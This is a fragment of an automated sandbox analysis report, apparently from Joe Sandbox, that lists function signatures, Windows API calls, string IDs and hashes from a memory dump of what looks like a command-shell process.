                                              • Instruction Fuzzy Hash: 3F41E433A0879187E7149B21E4457BD7AA1FB8CB64F448535EA0AC37A4CF3DE845CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                              • String ID:
                                              • API String ID: 3588551418-0
                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction ID: df1da2599e1a72d5a78126d29ae598be3ee3754598b874a64c328fba632621e8
                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction Fuzzy Hash: D3419033A08242CBE7549B11E4503BDB661EF8DBA9F144039D60EC77A5CF7EE840874A
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A7AF
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A80E
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseErrorLastOpen
                                              • String ID:
                                              • API String ID: 2240656346-0
                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction ID: ffb029548c0d648dca5e797d9d3cdd78ca19362eb8a50b9959d5b0e6d4a9d468
                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction Fuzzy Hash: 16318233628A8182E7508F15E4406B9B7A4FB8D7A4F544134EA4E83774DF3ED4498B45
                                              APIs
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D0F9
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D10F
                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D166
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D17A
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D18C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                              • String ID:
                                              • API String ID: 3008996577-0
                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction ID: d007d86092f68e37f942bcc0a1fec625e1ecc602c61e8193303210e364682e15
                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction Fuzzy Hash: 9F214B27B14A51CAE7009BB1E4002FD77B0FB4DB68B445125EE0D93B68DF39E044CB19
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateSemaphore
                                              • String ID: _p0$wil
                                              • API String ID: 1078844751-1814513734
                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction ID: 45008ca9652760eb1404079e97b845067e79f21fcac3388420307921d374a5ca
                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction Fuzzy Hash: 15510663B197C286EE218F1584543F97290EF8CBA8FA44435DA0D977A5DF3EE405870A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DiskFreeSpace
                                              • String ID: %5lu
                                              • API String ID: 2448137811-2100233843
                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction ID: f8bab77daf7c69269cc75b6559e686c22f764331b37a0fd9f688e219f98dede5
                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction Fuzzy Hash: 14419123708AC195EB61DF11E8407EAB360FB89798F448036DA4D8B768DF7DD249CB05
                                              APIs
                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6EB19B934
                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9A5
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                              • String ID: %WINDOWS_COPYRIGHT%
                                              • API String ID: 1103618819-1745581171
                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction ID: a3bab6ffc0421f305a708609079b617eca9dd6ace435842a03f167c34aa8f4f4
                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction Fuzzy Hash: EF41A3A3A1878182EA108F1594103FA73A0FB5DBE8F455235DE9D833A5EF3EE485C705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_wcslwr
                                              • String ID: [%s]
                                              • API String ID: 886762496-302437576
                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction ID: 177afd252a68ab93ca058ca1520b9aa680b34ba191fc0ba5dba03387951796ac
                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction Fuzzy Hash: 13316933B05B8286EB21CF21D8543E967A0FB8DB98F444035DA8D8B769DF3DE2498705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 383729395-2781220306
                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction ID: 5536a2873e0241de2371be545cf7da72d6289bd92f35caf4f2b0d95cb0b6a4fa
                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction Fuzzy Hash: AF119133908682C1EA558B14E9402F96261FB4C7F8F445332D67D832F4EF2EE485874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1646373207-2530943252
                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction ID: 3dea42dffc85d8f21959ad4a8c880efcb27f43622a36b88b9bad74bbe207ed66
                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction Fuzzy Hash: 99010863E09B07C5EA448B11B8913F462A0EF4E738F540339D53E923F0DE2E7485870A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction ID: 28940a929975d41681973c16c69075499e64828228b21c54ffa0d37e7388adbe
                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction Fuzzy Hash: 7C61CE33A18B928AEB20CB21E8403ED37A4FB89768F104134DE5D93BA9DF79E450C705
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr
                                              • String ID:
                                              • API String ID: 3270668897-0
                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction ID: 171141bf0dcb904ab1a4cbb9127d434c51bbc51e55c5ecca81bd9a9267663299
                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction Fuzzy Hash: 5851A313E0C64281EB619F10E4403F8A3A1FF4DBA8F588131DA4EC76F9DE2EE545835A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveFullNamePathType
                                              • String ID:
                                              • API String ID: 3442494845-0
                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction ID: 116b7926e7ae58be723d5bc75909094960bea220d9b84d6a86078f43e30d1c7a
                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction Fuzzy Hash: C831AF33615BC18AEB60CF11E8443E973A4FB89B88F044035DA4D87B64CF39E245C700
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction ID: fa79b173a9db915869f3fecc71684ef5ce07706224ceeb39ef2b6c669e847bd2
                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction Fuzzy Hash: 7441B676A08F4195EB509B18F8903E573A4FB8C768F904036DA8D92774DF7EE548CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcstol$lstrcmp
                                              • String ID:
                                              • API String ID: 3515581199-0
                                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction ID: b27757fd27c20424b43842c56d115df4a6b3308f9ef2355141ce87de34d02cc8
                                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction Fuzzy Hash: 5D21E433A08742C3E7624B79A5943BAABA0FF4E768F415034DB4F82664DF6EE4458709
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$TimeWrite
                                              • String ID:
                                              • API String ID: 4019809305-0
                                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction ID: 841eedb2b92e915e253b8a1e62f7a320c0fcfab1e5dcdf917ea22e3ca0a7e621
                                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction Fuzzy Hash: 0E31B723A0879686E7544B14A8443B8A691FF4DB78F045138D90DC3BF9CF3ED844874A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveNamePathTypeVolume
                                              • String ID:
                                              • API String ID: 1029679093-0
                                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction ID: 792c95c1463159c09c497f4e8b6749e59e4c4b95315d65dd42243521c8148662
                                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction Fuzzy Hash: D0313A33705B818AEB208F21D9943E867A4FB8DB98F444135CA4D87758DF3DE659CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
